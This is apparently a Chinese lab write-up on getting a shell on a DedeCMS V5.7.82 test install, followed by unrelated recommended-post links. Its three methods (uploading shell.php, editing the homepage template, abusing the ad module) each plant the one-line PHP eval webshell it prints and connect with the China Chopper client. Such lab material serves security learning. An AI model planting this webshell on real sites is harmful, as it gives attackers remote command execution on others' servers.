DedeCMS-V5.7.82-UTF8织梦管理系统漏洞

将靶场环境放到www目录下------访问/dedecms/uploads

安装程序 - 织梦内容管理系统 V5.7 UTF8SP2

同意协议------继续

继续

配置后------点击继续

进入后台

登录后台------填写用户名密码。

方法一:上传shell文件

后台------核心------附件管理------上传新文件。

访问/dedecms/uploads/uploads/shell.php

使用菜刀工具连接

进入了目录资源管理器

方法二:模板修改index.html

模板------默认模板管理------修改主页模板

在代码里面插入一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

保存

点击生成------更新主页html------配置一下------点击更新。

浏览------访问/dedecms/uploads/index.php

使用菜刀连接

方法三:广告模块任意命令插入shell

利用广告模块

插入一句话木马

点击代码------修改

使用菜刀连接

相关推荐
好好学习O(∩_∩)O39 分钟前
[网络][tcp协议]:tcp报头
服务器·网络·tcp/ip
无名之逆2 小时前
Hyperlane:Rust 生态中的轻量级高性能 HTTP 服务器库,助力现代 Web 开发
服务器·开发语言·前端·后端·http·面试·rust
Python破壁人手记2 小时前
《我的Python觉醒之路》之转型Python(十五)——控制流
java·服务器·开发语言·网络·python
无名之逆3 小时前
轻量级、高性能的 Rust HTTP 服务器库 —— Hyperlane
服务器·开发语言·前端·后端·http·rust
「QT(C++)开发工程师」4 小时前
嵌入式Linux | 什么是 BootLoader、Linux 内核(kernel)、和文件系统?
linux·运维·服务器
无名之逆4 小时前
探索Hyperlane:用Rust打造轻量级、高性能的Web后端框架
服务器·开发语言·前端·后端·算法·rust
stackY、4 小时前
【Linux】:socket编程——UDP
linux·运维·服务器·udp
Ares-Wang4 小时前
Linux >> LVM 技术 磁盘扩容
linux·运维·服务器
程序员JerrySUN5 小时前
实战指南:从零构建 Linux 声卡字符设备驱动——深入 ALSA 框架与内核模块开发
linux·运维·服务器
weixi_kelaile5206 小时前
智能电话机器人的技术原理是什么?AI语音机器人评判标准是什么?
运维·服务器·人工智能·机器人·语音识别